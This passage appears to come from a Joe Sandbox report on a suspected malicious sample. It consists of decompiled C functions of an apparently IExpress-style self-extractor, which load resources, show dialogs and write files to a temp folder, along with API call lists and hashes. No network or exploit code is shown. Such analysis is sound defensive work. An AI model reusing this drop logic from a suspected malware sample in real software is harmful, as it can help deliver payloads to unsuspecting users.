                                                                                                                                                                                                          • Part of subcall function 00A92773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A92870
                                                                                                                                                                                                          • Part of subcall function 00A92773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A928A0
                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00A93938,?,?,?,?,-00000005), ref: 00A92958
                                                                                                                                                                                                        • GlobalLock.KERNEL32 ref: 00A92969
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A93938,?,?,?,?,-00000005,?), ref: 00A92A21
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00A92A81
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3949799724-0
                                                                                                                                                                                                        • Opcode ID: c5b59f4f7ef3d8edd321a8132c5ad63f595662c03cafe54904a88e3e4175a1d8
                                                                                                                                                                                                        • Instruction ID: 183369cd977eeb86233fc5e9757b62452ac8491e2d96eecb4cb0efee83dfb3be
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5b59f4f7ef3d8edd321a8132c5ad63f595662c03cafe54904a88e3e4175a1d8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4512932E00219EFCF25DF98C884AAEBBF5FF48740F14402AE905E7611DB319941DB94
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 32%
                                                                                                                                                                                                        			E00A94169(void* __eflags) {
                                                                                                                                                                                                        				int _t18;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 = E00A9468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                        				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                        				if(_t21 != 0) {
                                                                                                                                                                                                        					if(E00A9468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                        						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							return LocalFree(_t21);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(0x40);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(_t21);
                                                                                                                                                                                                        						_t18 = 0x3e9;
                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                        						E00A944B9(0, _t18);
                                                                                                                                                                                                        						goto L7;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0x10);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_t18 = 0x4b1;
                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00A944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                          • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00A930B4), ref: 00A94189
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00A930B4), ref: 00A941E7
                                                                                                                                                                                                          • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                          • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00A94554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$FINISHMSG
                                                                                                                                                                                                        • API String ID: 3507850446-3091758298
                                                                                                                                                                                                        • Opcode ID: 3f5246e601051582647672233ec71b38d6120b07f73601c8a2b33254faa01e7e
                                                                                                                                                                                                        • Instruction ID: 0edb4416e5e549c10dd7bbfeaa1db75c8a22cbd8b44b71cce5e6dddb1c092763
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f5246e601051582647672233ec71b38d6120b07f73601c8a2b33254faa01e7e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA01FFF53002243BFF2427A94C86F7B21DEDBE9795F204226B706E62809EA8CC0341B5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00A919E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v520;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                        				struct HWND__* _t34;
                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __edi;
                                                                                                                                                                                                        				_t27 = __ebx;
                                                                                                                                                                                                        				_t11 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                        				_t34 = _a4;
                                                                                                                                                                                                        				_t14 = _a8 - 0x110;
                                                                                                                                                                                                        				if(_t14 == 0) {
                                                                                                                                                                                                        					_t32 = GetDesktopWindow();
                                                                                                                                                                                                        					E00A943D0(_t34, _t15);
                                                                                                                                                                                                        					_v520 = 0;
                                                                                                                                                                                                        					LoadStringA( *0xa99a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                        					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                        					MessageBeep(0xffffffff);
                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if(_t14 != 1) {
                                                                                                                                                                                                        						L4:
                                                                                                                                                                                                        						_t23 = 0;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t32 = _a12;
                                                                                                                                                                                                        						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							EndDialog(_t34, _t32);
                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                        							_t23 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00A96CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                        			}














                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00A91A18
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00A91A24
                                                                                                                                                                                                        • LoadStringA.USER32(?,?,00000200), ref: 00A91A4F
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00A91A62
                                                                                                                                                                                                        • MessageBeep.USER32(000000FF), ref: 00A91A6A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1273765764-0
                                                                                                                                                                                                        • Opcode ID: bad9e26e15d343a9c6fe89d8391c3427c133fd938cb18485e38216a3abf0e0db
                                                                                                                                                                                                        • Instruction ID: 28ffb22c877db83ba57deb731e0f5f80cf3484d4beced83219d93ea509f980bf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bad9e26e15d343a9c6fe89d8391c3427c133fd938cb18485e38216a3abf0e0db
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6511A53170110AAFDF10EFA4DE08AAE77F8EF59340F204256F51296590DE349E02CB95
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                                                        			E00A963C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				long _v272;
                                                                                                                                                                                                        				void* _v276;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				long _t28;
                                                                                                                                                                                                        				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                        				signed int _t40;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t15 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                        				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_v276 = _a16;
                                                                                                                                                                                                        				_t37 = 1;
                                                                                                                                                                                                        				E00A91781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                        				E00A9658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                        				_t28 = 0;
                                                                                                                                                                                                        				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                        				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                        					_t28 = _a4;
                                                                                                                                                                                                        					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                        						 *0xa99124 = 0x80070052;
                                                                                                                                                                                                        						_t37 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					CloseHandle(_t39);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					 *0xa99124 = 0x80070052;
                                                                                                                                                                                                        					_t37 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00A96CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                        			}
















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00A9642D
                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00A9645B
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00A9647A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00A963EB
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                        • API String ID: 1065093856-2312194364
                                                                                                                                                                                                        • Opcode ID: 8a3deda819ab6c744169314b510237268fa445c138c8e15ffab3ffff644cc3fd
                                                                                                                                                                                                        • Instruction ID: cf29f51a44b085467e32f3d7baca73cb4cc7207f1ca92b07c52387d595e137b1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a3deda819ab6c744169314b510237268fa445c138c8e15ffab3ffff644cc3fd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6721C671B00118ABDB10DFA5DC85FEB73B8EB99314F10426AB54597140DAB05D858FA4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A947E0(intOrPtr* __ecx) {
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				intOrPtr _t9;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                        				intOrPtr* _t22;
                                                                                                                                                                                                        				void _t24;
                                                                                                                                                                                                        				struct HWND__* _t25;
                                                                                                                                                                                                        				struct HWND__* _t26;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				intOrPtr* _t28;
                                                                                                                                                                                                        				intOrPtr* _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                                        				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                        				if(_t34 != 0) {
                                                                                                                                                                                                        					_t22 = _t33;
                                                                                                                                                                                                        					_t27 = _t22 + 1;
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t6 =  *_t22;
                                                                                                                                                                                                        						_t22 = _t22 + 1;
                                                                                                                                                                                                        					} while (_t6 != 0);
                                                                                                                                                                                                        					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                        					 *_t34 = _t24;
                                                                                                                                                                                                        					if(_t24 != 0) {
                                                                                                                                                                                                        						_t28 = _t33;
                                                                                                                                                                                                        						_t19 = _t28 + 1;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t9 =  *_t28;
                                                                                                                                                                                                        							_t28 = _t28 + 1;
                                                                                                                                                                                                        						} while (_t9 != 0);
                                                                                                                                                                                                        						E00A91680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                        						_t11 =  *0xa991e0; // 0x31c8320
                                                                                                                                                                                                        						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                        						 *0xa991e0 = _t34;
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t25 =  *0xa98584; // 0x0
                                                                                                                                                                                                        					E00A944B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                        					LocalFree(_t34);
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t26 =  *0xa98584; // 0x0
                                                                                                                                                                                                        				E00A944B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                        				goto L2;
                                                                                                                                                                                                        			}
















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00A94E6F), ref: 00A947EA
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00A94823
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00A94847
                                                                                                                                                                                                          • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                          • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00A94554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00A94851
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                        • API String ID: 359063898-2312194364
                                                                                                                                                                                                        • Opcode ID: e85aa0bc9765a5ed172d49e119227b3f57e3e070c00e52f26703a4cbd713366d
                                                                                                                                                                                                        • Instruction ID: f16fc726ee13bcd084f308ae7f9ab3397ebb48c64eda13632b53b19eca2e8ea6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e85aa0bc9765a5ed172d49e119227b3f57e3e070c00e52f26703a4cbd713366d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D11C2797046416FDF24DFA49C58F773BAAEBCA300F14C55AEA829B251DE358C078760
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A93680(void* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				struct tagMSG _v36;
                                                                                                                                                                                                        				int _t8;
                                                                                                                                                                                                        				struct HWND__* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v8 = __ecx;
                                                                                                                                                                                                        				_t16 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                        					if(_t8 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							if(_v36.message != 0x12) {
                                                                                                                                                                                                        								DispatchMessageA( &_v36);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t16 = 1;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                        						} while (_t8 != 0);
                                                                                                                                                                                                        						if(_t16 == 0) {
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					break;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t8;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A9369F
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A936B2
                                                                                                                                                                                                        • DispatchMessageA.USER32(?), ref: 00A936CB
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A936DA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2776232527-0
                                                                                                                                                                                                        • Opcode ID: 6636c9ec1773a1210f0576370f744e55f44e9cce52a023d82cfe7545a753e948
                                                                                                                                                                                                        • Instruction ID: c0d51a56f3d1165de9dea7f1c77a8c37039630edeef9f7ea3022a3fab9db44f7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6636c9ec1773a1210f0576370f744e55f44e9cce52a023d82cfe7545a753e948
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84016773B0025577DF308BE65C48EEB76BCEBC5B10F14021BFA15E2184D965CA45C6A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E00A96517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                        				struct HRSRC__* _t6;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				struct HINSTANCE__* _t23;
                                                                                                                                                                                                        				int _t24;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t23 =  *0xa99a3c; // 0xa90000
                                                                                                                                                                                                        				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                        				if(_t6 == 0) {
                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                        					E00A944B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					_t24 = _a16;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                        					if(_t21 == 0) {
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_a12 != 0) {
                                                                                                                                                                                                        							_push(_a12);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                        						FreeResource(_t21);
                                                                                                                                                                                                        						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t24;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00A90000,000007D6,00000005), ref: 00A9652A
                                                                                                                                                                                                        • LoadResource.KERNEL32(00A90000,00000000,?,?,00A92EE8,00000000,00A919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A96538
                                                                                                                                                                                                        • DialogBoxIndirectParamA.USER32(00A90000,00000000,00000547,00A919E0,00000000), ref: 00A96557
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00A92EE8,00000000,00A919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A96560
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1214682469-0
                                                                                                                                                                                                        • Opcode ID: 23ffe193f6f475f8cfcebbcb222a71e1b6bf07b968c4dbb38ec48b656e520e09
                                                                                                                                                                                                        • Instruction ID: 7fff8f9e40d0fe7e8298db93c2ab598f2212b00034e5a06050db7e4b98d57819
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 23ffe193f6f475f8cfcebbcb222a71e1b6bf07b968c4dbb38ec48b656e520e09
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A012672300615BBCF109FA99C08DBB7AACEF89360F01012BFE0093150DB718C1286E1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                                                        			E00A965E8(char* __ecx) {
                                                                                                                                                                                                        				char _t3;
                                                                                                                                                                                                        				char _t10;
                                                                                                                                                                                                        				char* _t12;
                                                                                                                                                                                                        				char* _t14;
                                                                                                                                                                                                        				char* _t15;
                                                                                                                                                                                                        				CHAR* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t12 = __ecx;
                                                                                                                                                                                                        				_t15 = __ecx;
                                                                                                                                                                                                        				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                        				_t10 = 0;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t3 =  *_t12;
                                                                                                                                                                                                        					_t12 =  &(_t12[1]);
                                                                                                                                                                                                        				} while (_t3 != 0);
